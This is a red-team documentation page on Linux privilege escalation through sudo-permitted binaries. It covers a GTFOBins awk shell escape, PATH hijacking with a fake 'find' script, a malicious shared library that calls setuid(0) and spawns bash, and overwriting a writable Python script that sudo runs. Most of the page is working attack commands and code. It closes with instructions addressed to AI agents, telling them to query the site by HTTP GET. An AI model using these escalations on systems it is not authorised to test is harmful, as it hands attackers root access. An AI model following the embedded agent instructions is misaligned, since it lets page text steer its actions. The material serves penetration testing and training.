# Sudo Binaries

## Theory

On this page, we speak about vulnerabilities within a sudo binary/script itself. Custom or known binaries/scripts may be exploited and allow us to subvert sudo's intended functionality.

## Practice

### Known Sudo Binaries Exploits

{% tabs %}
{% tab title="GTFOBins" %}
If the binary is allowed to run as `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

If you find that a binary can be run as sudo, you can check on [GTFOBins](https://gtfobins.github.io/) for known exploits.

```bash
$ sudo -l

User demo may run the following commands on crashlab:
    (root): /usr/bin/awk
```

{% endtab %}

{% tab title="Example" %}
If you can run a binary with sudo rights, you may want to have look at [GTFOBins](https://gtfobins.github.io/), a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with `awk`, we can spawn a shell with following commands:

```bash
sudo awk 'BEGIN {system("/bin/sh")}'
```

{% endtab %}
{% endtabs %}

### No Command Path Exploit

{% tabs %}
{% tab title="Enumerate" %}
If a **sudo** binary/script executes another command **without specifying the path.** We can abuse it and get a privilege escalation.

{% hint style="danger" %}
Note that **`env_reset`** and **`secure_path`** should not be set !
{% endhint %}

You may use `strings` to spot other binaries calls, or do some reverse engineering on the **sudo** binary.

```bash
$ sudo -l
User demo may run the following commands on crashlab:
    (root): /opt/bin/the-sudo-bin

$ strings ./the-sudo-bin
...
find
...
```

{% endtab %}

{% tab title="Exploit" %}
We can create a malicious executable with the same name as the one called by the s**udo** binary.

```bash
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find
```

\
Then, set the **PATH** env variable before executing the Sudo binary.

```bash
#Sudo with modified PATH
export PATH=/tmp:$PATH 
./the-sudo-bin
```

{% endtab %}
{% endtabs %}

### Shared Library Hijacking

{% tabs %}
{% tab title="Enumerate" %}
If you find some binary with **Sudo** permissions, you can check if all the **.so** files are **loaded correctly.**

```bash
strace the-sudo-bin 2>&1 | grep -i -E "open|access|no such file"
```

You also could check if the **Sudo** binary is loading a library from a folder **where we can write**:

```bash
# Lets find a Sudo using a non-standard library
ldd the-sudo-bin
something.so => /lib/x86_64-linux-gnu/something.so

# The Sudo also loads libraries from a custom location where we can write
readelf -d the-sudo-bin | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]
```

Alternatively, you could use the `strings` command to find used shared library

```bash
strings ./the-sudo-bin | grep -i '*.so*'
```

{% endtab %}

{% tab title="Exploit" %}
For example, if you find that the **Sudo** binary **doesn't** **load correctly** *`/home/user/.config/libcalc.so`* or that you can overwrite it, you can exploit it.

Write a malicious shared library

```c
//Saved to /home/user/.config/libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        printf("Hello from the bad library");
        //setreSudo(0,0,0);
        setuid(0);
        setgid(0);
        system("/bin/bash -p");
}
```

Compile it

```bash
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
```

Execute the Sudo binary

```bash
sudo the-sudo-bin
```

{% hint style="info" %}
If you get an error such as

```shell-session
./Sudo_bin: symbol lookup error: ./Sudo_bin: undefined symbol: a_function_name
```

that means that the library you have generated need to have a function called `a_function_name`.
{% endhint %}
{% endtab %}
{% endtabs %}

### Weak File Permissions

{% tabs %}
{% tab title="Enumerate" %}
If you find some binary/script with **Sudo** permissions, you could check if you have enought rights to overwrite it. If so, you can replace it by a malicious one.

```bash
sudo -l
        (root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py
```

Check permissions:

```bash
ls -la /home/<username>/
ls -la /home/<username>/example.py
```

{% endtab %}

{% tab title="Exploit" %}
If the python script is **under a directory that you own**, or if you have **direct write access** on it. We can remove the script and create a new one with the same name.

```bash
rm -rf /home/<username>/example.py
touch /home/<username>/example.py
```

We can insert arbitrary code in the new script. For example,

```python
import os;os.system('/bin/bash')
```

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#sudo>" %}

{% embed url="<https://tryhackme.com/room/linuxprivescarena>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/redteam/privilege-escalation/linux/sudo-exploits/sudo-binaries.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.